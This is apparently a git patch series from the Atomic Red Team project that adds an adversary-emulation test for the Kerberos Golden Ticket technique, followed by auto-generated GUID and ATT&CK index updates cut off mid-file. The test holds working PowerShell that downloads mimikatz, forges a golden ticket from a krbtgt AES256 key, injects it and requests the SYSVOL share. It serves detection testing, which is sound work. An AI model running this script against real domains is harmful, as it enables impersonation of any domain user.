100 insertions(+) create mode 100644 atomics/T1558.001/T1558.001.yaml diff --git a/atomics/T1558.001/T1558.001.yaml b/atomics/T1558.001/T1558.001.yaml new file mode 100644 index 00000000..2c5ba55e --- /dev/null +++ b/atomics/T1558.001/T1558.001.yaml @@ -0,0 +1,100 @@ +attack_technique: T1558.001 +display_name: 'Steal or Forge Kerberos Tickets: Golden Ticket' +atomic_tests: +- name: Crafting golden tickets with mimikatz + auto_generated_guid: 9726592a-dabc-4d4d-81cd-44070008b3af + description: | + Once the hash of the special krbtgt user is retrieved it is possible to craft Kerberos Ticket Granting Ticket impersonating any user in the domain. + This test crafts a Golden Ticket and then performs an SMB request with it for the SYSVOL share, thus triggering a service ticket request (event ID 4769). + The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session. + supported_platforms: + - windows + input_arguments: + domain_sid: + description: SID of the targeted domain, if you keep default it will automatically get the current domain SID + type: string + default: S-1-5-21-DEFAULT + domain: + description: Targeted domain FQDN + type: string + default: example.com + account: + description: Account to impersonate + type: string + default: goldenticketfakeuser + krbtgt_aes256_key: + description: Krbtgt AES256 key + type: string + default: b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 + mimikatz_path: + description: Mimikatz windows executable + type: path + default: '$env:TEMP\mimikatz\x64\mimikatz.exe' + dependency_executor_name: powershell + dependencies: + - description: | + Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) + prereq_command: | + $mimikatz_path = cmd /c echo #{mimikatz_path} + if (Test-Path $mimikatz_path) {exit 0} else {exit 1} + get_prereq_command: | + $mimikatz_path = cmd /c echo #{mimikatz_path} + Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" + Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force + New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null + Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force + executor: + name: powershell + elevation_required: false + command: | + Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore + Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore + + # get current domain SID if default was used + $domain_sid = "#{domain_sid}" + If ($domain_sid -Match "DEFAULT") { + # code from https://www.sevecek.com/EnglishPages/Lists/Posts/Post.aspx?ID=60 + $domain = gwmi Win32_ComputerSystem | Select -Expand Domain + $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value + $domain_sid = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-')) + } + + # create batch file with commands to run in a separate "runas /netonly" session + # so we don't purge Kerberos ticket from the current Windows session + # its output goes to golden.txt temp file, because we cannot capture "runas /netonly" output otherwise + @" + >%TEMP%\golden.txt 2>&1 ( + echo Purge existing tickets and create golden ticket: + klist purge + #{mimikatz_path} "kerberos::golden /domain:#{domain} /sid:DOMAIN_SID /aes256:#{krbtgt_aes256_key} /user:#{account} /ptt" "exit" + + echo. + echo Requesting SYSVOL: + dir \\#{domain}\SYSVOL + + echo. + echo Tickets after requesting SYSVOL: + klist + + echo. + echo End of Golden Ticket attack + ) + "@ -Replace "DOMAIN_SID", $domain_sid | Out-File -Encoding OEM $env:TEMP\golden.bat + + # run batch file in a new empty session (password and username do not matter) + echo "foo" | runas /netonly /user:fake "$env:TEMP\golden.bat" | Out-Null + + # wait until the output file has logged the entire attack + do { + Start-Sleep 1 # wait a bit so the output file has time to be created + Get-Content -Path "$env:TEMP\golden.txt" -Wait | ForEach-Object { + if ($_ -match 'End of Golden Ticket attack') { break } + } + } while ($false) # dummy loop so that 'break' can be used + + # show output from new empty session + Get-Content $env:TEMP\golden.txt + + # cleanup temp files + Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore + Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore \ No newline at end of file From 7ef584f9fde7c58d40cc6dd0269f26c6221d3609 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Wed, 6 Jan 2021 18:35:42 +0000 Subject: [PATCH 041/131] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/used_guids.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 02463d55..677716c5 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -643,3 +643,4 @@ a524ce99-86de-4db6-b4f9-e08f35a47a15 22cfde89-befe-4e15-9753-47306b37a6e3 9ebe7901-7edf-45c0-b5c7-8366300919db 96f974bb-a0da-4d87-a744-ff33e73367e9 +9726592a-dabc-4d4d-81cd-44070008b3af From 443e0318fc7d05c9ac141629b3f8a97e0b204ce2 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 6 Jan 2021 18:35:50 +0000 Subject: [PATCH 042/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- .../art-navigator-layer-windows.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 3 +- .../Indexes/Indexes-Markdown/windows-index.md | 3 +- atomics/Indexes/Matrices/matrix.md | 2 +- atomics/Indexes/Matrices/windows-matrix.md | 2 +- atomics/Indexes/index.yaml | 77 +++++++++++- atomics/T1558.001/T1558.001.md | 115 ++++++++++++++++++ 10 files changed, 201 insertions(+), 7 deletions(-) create mode 100644 atomics/T1558.001/T1558.001.md diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json index 71bf2f69..788b3997 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json @@ -1 +1 @@ -{"version":"3.0","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file +{"version":"3.0","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index bef475a2..98af3792 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json @@ -1 +1 @@ -{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"